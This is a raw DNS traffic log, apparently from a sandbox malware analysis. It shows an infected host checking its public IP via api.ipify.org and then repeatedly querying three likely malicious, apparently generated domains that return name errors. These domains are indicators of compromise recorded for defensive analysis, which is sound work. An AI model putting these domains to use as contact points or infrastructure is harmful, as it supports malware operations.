                        Apr 26, 2023 12:40:42.615147114 CEST192.168.2.21.1.1.10x8a0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.940475941 CEST192.168.2.21.1.1.10x9b04Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.963718891 CEST192.168.2.21.1.1.10xadd2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.985850096 CEST192.168.2.21.1.1.10x2a2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.272308111 CEST192.168.2.21.1.1.10x132aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.295399904 CEST192.168.2.21.1.1.10x561eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.322148085 CEST192.168.2.21.1.1.10x8d9aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.644110918 CEST192.168.2.21.1.1.10xcff2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.676831961 CEST192.168.2.21.1.1.10x1be0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.699157000 CEST192.168.2.21.1.1.10x57e2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.062434912 CEST192.168.2.21.1.1.10xda0cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.084846020 CEST192.168.2.21.1.1.10xc19bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.119399071 CEST192.168.2.21.1.1.10x91c5Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.494345903 CEST192.168.2.21.1.1.10x2e30Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.518578053 CEST192.168.2.21.1.1.10x153Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.544121027 CEST192.168.2.21.1.1.10xa5ceStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.882415056 CEST192.168.2.21.1.1.10x1219Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.906562090 CEST192.168.2.21.1.1.10x2736Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.932466984 CEST192.168.2.21.1.1.10x62d8Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.266325951 CEST192.168.2.21.1.1.10x6960Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.291740894 CEST192.168.2.21.1.1.10xf74Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.400538921 CEST192.168.2.21.1.1.10x70d9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.643866062 CEST192.168.2.21.1.1.10x2acaStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.731718063 CEST192.168.2.21.1.1.10x3e20Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.755099058 CEST192.168.2.21.1.1.10x9a89Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.031048059 CEST192.168.2.21.1.1.10x7fbStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.054236889 CEST192.168.2.21.1.1.10x1fc8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.077351093 CEST192.168.2.21.1.1.10xeb1eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.487747908 CEST192.168.2.21.1.1.10xea7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.512701988 CEST192.168.2.21.1.1.10x5009Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.535870075 CEST192.168.2.21.1.1.10x8c3cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.770996094 CEST192.168.2.21.1.1.10xc7bcStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.794178963 CEST192.168.2.21.1.1.10xae9eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.816823959 CEST192.168.2.21.1.1.10x175Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.193304062 CEST192.168.2.21.1.1.10x9b71Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.216890097 CEST192.168.2.21.1.1.10x4367Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.240839958 CEST192.168.2.21.1.1.10xad00Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.758004904 CEST192.168.2.21.1.1.10xaee0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.789252043 CEST192.168.2.21.1.1.10x681dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.812813997 CEST192.168.2.21.1.1.10x3802Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.153791904 CEST192.168.2.21.1.1.10x811fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.179054022 CEST192.168.2.21.1.1.10x8255Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.206893921 CEST192.168.2.21.1.1.10x94cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.539597988 CEST192.168.2.21.1.1.10xb9d3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.564369917 CEST192.168.2.21.1.1.10xb0d8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.591605902 CEST192.168.2.21.1.1.10x53e2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.905669928 CEST192.168.2.21.1.1.10x1c1Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.934456110 CEST192.168.2.21.1.1.10x51daStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.957217932 CEST192.168.2.21.1.1.10x35f4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.270684958 CEST192.168.2.21.1.1.10xe16fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.378237963 CEST192.168.2.21.1.1.10xeb39Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.406935930 CEST192.168.2.21.1.1.10xb10aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.709482908 CEST192.168.2.21.1.1.10xaabdStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.734848976 CEST192.168.2.21.1.1.10x7779Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.757905960 CEST192.168.2.21.1.1.10x22abStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.134951115 CEST192.168.2.21.1.1.10x1d2dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.184127092 CEST192.168.2.21.1.1.10xd9a3Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.207884073 CEST192.168.2.21.1.1.10x6534Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.522583961 CEST192.168.2.21.1.1.10x107eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.621102095 CEST192.168.2.21.1.1.10x991fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.648551941 CEST192.168.2.21.1.1.10xefStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.980151892 CEST192.168.2.21.1.1.10x84c7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.003087044 CEST192.168.2.21.1.1.10xf1a0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.025228977 CEST192.168.2.21.1.1.10x4f20Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.468503952 CEST192.168.2.21.1.1.10x971Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.492110014 CEST192.168.2.21.1.1.10x2514Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.518815041 CEST192.168.2.21.1.1.10x4374Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.801219940 CEST192.168.2.21.1.1.10x210cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.860270977 CEST192.168.2.21.1.1.10x690dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.888705969 CEST192.168.2.21.1.1.10xf536Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.243951082 CEST192.168.2.21.1.1.10x8326Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.278228998 CEST192.168.2.21.1.1.10xd821Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.301156998 CEST192.168.2.21.1.1.10x8d50Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.671370029 CEST192.168.2.21.1.1.10xbfc9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.697660923 CEST192.168.2.21.1.1.10xba82Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.721177101 CEST192.168.2.21.1.1.10xa7ceStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.073817015 CEST192.168.2.21.1.1.10x2b58Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.101244926 CEST192.168.2.21.1.1.10x38f5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.127386093 CEST192.168.2.21.1.1.10x150cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.387171984 CEST192.168.2.21.1.1.10xe464Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.413469076 CEST192.168.2.21.1.1.10x3ad5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.436791897 CEST192.168.2.21.1.1.10xef88Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.874950886 CEST192.168.2.21.1.1.10xf92bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.899842024 CEST192.168.2.21.1.1.10xb26bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.927035093 CEST192.168.2.21.1.1.10x4409Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.271672964 CEST192.168.2.21.1.1.10xdd25Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.386765003 CEST192.168.2.21.1.1.10x2f98Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.414594889 CEST192.168.2.21.1.1.10xb2f5Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.838694096 CEST192.168.2.21.1.1.10x52e8Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.884094000 CEST192.168.2.21.1.1.10xbe71Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.943175077 CEST192.168.2.21.1.1.10x9761Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.338779926 CEST192.168.2.21.1.1.10x9be4Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.365276098 CEST192.168.2.21.1.1.10x56e2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.402781010 CEST192.168.2.21.1.1.10xa2ccStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.696634054 CEST192.168.2.21.1.1.10xf1afStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.758820057 CEST192.168.2.21.1.1.10x6bbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.782363892 CEST192.168.2.21.1.1.10x2880Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.143296003 CEST192.168.2.21.1.1.10x2441Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.188334942 CEST192.168.2.21.1.1.10x25cbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.223530054 CEST192.168.2.21.1.1.10x3ac3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.740823984 CEST192.168.2.21.1.1.10x64f5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.764627934 CEST192.168.2.21.1.1.10x5ecaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.788259029 CEST192.168.2.21.1.1.10xedbfStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.119465113 CEST192.168.2.21.1.1.10x3411Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.165115118 CEST192.168.2.21.1.1.10x4481Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.192158937 CEST192.168.2.21.1.1.10xb7cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.557265997 CEST192.168.2.21.1.1.10xc4fdStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.581631899 CEST192.168.2.21.1.1.10xe52dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.632987976 CEST192.168.2.21.1.1.10x8f51Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.014970064 CEST192.168.2.21.1.1.10x8cfeStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.046047926 CEST192.168.2.21.1.1.10x2bf2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.070099115 CEST192.168.2.21.1.1.10xc513Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.442787886 CEST192.168.2.21.1.1.10x4f6bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.466531038 CEST192.168.2.21.1.1.10x9369Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.489198923 CEST192.168.2.21.1.1.10x6bb6Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.826946974 CEST192.168.2.21.1.1.10xab81Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.849884987 CEST192.168.2.21.1.1.10xa8f9Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.877446890 CEST192.168.2.21.1.1.10x2ce8Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:59.479151011 CEST192.168.2.21.1.1.10x50e9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:59.509520054 CEST192.168.2.21.1.1.10x7506Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:59.533948898 CEST192.168.2.21.1.1.10x6bbbStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.215060949 CEST192.168.2.21.1.1.10xe858Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.237896919 CEST192.168.2.21.1.1.10x5a3aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.262381077 CEST192.168.2.21.1.1.10xfd1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.734452009 CEST192.168.2.21.1.1.10x2032Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.760740995 CEST192.168.2.21.1.1.10x78bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.785484076 CEST192.168.2.21.1.1.10x15aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.170104027 CEST192.168.2.21.1.1.10x6340Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.198920012 CEST192.168.2.21.1.1.10x18baStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.235470057 CEST192.168.2.21.1.1.10xaa0eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.662128925 CEST192.168.2.21.1.1.10xf853Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.686124086 CEST192.168.2.21.1.1.10x92acStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.796566010 CEST192.168.2.21.1.1.10x4648Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.136540890 CEST192.168.2.21.1.1.10x6c9eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.163913965 CEST192.168.2.21.1.1.10x6f1cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.190819979 CEST192.168.2.21.1.1.10xb0e4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.644958019 CEST192.168.2.21.1.1.10x41cbStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.669007063 CEST192.168.2.21.1.1.10x54b5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.693022966 CEST192.168.2.21.1.1.10x63d6Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.929694891 CEST192.168.2.21.1.1.10x1b20Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.953598976 CEST192.168.2.21.1.1.10x3948Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.976407051 CEST192.168.2.21.1.1.10xa08Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:04.798135996 CEST192.168.2.21.1.1.10x8125Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:04.821480036 CEST192.168.2.21.1.1.10x5b35Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:04.845377922 CEST192.168.2.21.1.1.10xe4f2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Apr 26, 2023 12:39:08.952821970 CEST1.1.1.1192.168.2.20xe9b0No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                        Apr 26, 2023 12:39:08.952821970 CEST1.1.1.1192.168.2.20xe9b0No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:08.952821970 CEST1.1.1.1192.168.2.20xe9b0No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:08.952821970 CEST1.1.1.1192.168.2.20xe9b0No error (0)api4.ipify.org173.231.16.77A (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:09.439115047 CEST1.1.1.1192.168.2.20x9a35Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:09.531148911 CEST1.1.1.1192.168.2.20xd070Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:09.718512058 CEST1.1.1.1192.168.2.20xe6cbName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:10.277857065 CEST1.1.1.1192.168.2.20xdb96Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:10.375053883 CEST1.1.1.1192.168.2.20x5545Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:10.401182890 CEST1.1.1.1192.168.2.20x1578Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:10.685574055 CEST1.1.1.1192.168.2.20x1dabName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:10.757534981 CEST1.1.1.1192.168.2.20xeacbName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:10.813791037 CEST1.1.1.1192.168.2.20x3cffName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:11.110009909 CEST1.1.1.1192.168.2.20x5bf1Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:11.132643938 CEST1.1.1.1192.168.2.20xfb80Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:11.196624994 CEST1.1.1.1192.168.2.20x874fName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:11.591929913 CEST1.1.1.1192.168.2.20x5826Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:11.650285006 CEST1.1.1.1192.168.2.20xcc2Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:11.740138054 CEST1.1.1.1192.168.2.20xbe82Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:12.000230074 CEST1.1.1.1192.168.2.20x1921Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:12.064194918 CEST1.1.1.1192.168.2.20xfbc9Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:12.126926899 CEST1.1.1.1192.168.2.20x8e49Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:12.548561096 CEST1.1.1.1192.168.2.20xa1aName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:12.617754936 CEST1.1.1.1192.168.2.20x8ac3Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:12.643748045 CEST1.1.1.1192.168.2.20x1e45Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:13.077503920 CEST1.1.1.1192.168.2.20x4172Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:13.187711000 CEST1.1.1.1192.168.2.20x5decName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:13.295034885 CEST1.1.1.1192.168.2.20x5e82Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:13.676645041 CEST1.1.1.1192.168.2.20xf98aName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:13.774089098 CEST1.1.1.1192.168.2.20xbb3cName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:13.873217106 CEST1.1.1.1192.168.2.20x15cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:14.242264986 CEST1.1.1.1192.168.2.20xa38Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:14.272593975 CEST1.1.1.1192.168.2.20x5161Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:14.295007944 CEST1.1.1.1192.168.2.20x78d0Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:14.741055012 CEST1.1.1.1192.168.2.20xae62Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:14.811810970 CEST1.1.1.1192.168.2.20xb68fName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:14.835741043 CEST1.1.1.1192.168.2.20x9e87Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:15.150242090 CEST1.1.1.1192.168.2.20x21bdName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:15.248249054 CEST1.1.1.1192.168.2.20xf78cName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:15.318742990 CEST1.1.1.1192.168.2.20xf63cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:15.837482929 CEST1.1.1.1192.168.2.20xf9c7Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:15.983050108 CEST1.1.1.1192.168.2.20x4bd9Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:16.042918921 CEST1.1.1.1192.168.2.20xcb80Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:16.459687948 CEST1.1.1.1192.168.2.20x8d6Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:16.756397009 CEST1.1.1.1192.168.2.20xce63Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:16.820895910 CEST1.1.1.1192.168.2.20x9232Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:17.127188921 CEST1.1.1.1192.168.2.20x1f00Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:17.224607944 CEST1.1.1.1192.168.2.20xb6d2Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:17.293441057 CEST1.1.1.1192.168.2.20x2a33Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:17.773747921 CEST1.1.1.1192.168.2.20x6a58Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:17.797873020 CEST1.1.1.1192.168.2.20xcf47Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:17.906128883 CEST1.1.1.1192.168.2.20xebe7Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:18.308417082 CEST1.1.1.1192.168.2.20x87f3Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:18.368042946 CEST1.1.1.1192.168.2.20xfcbfName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
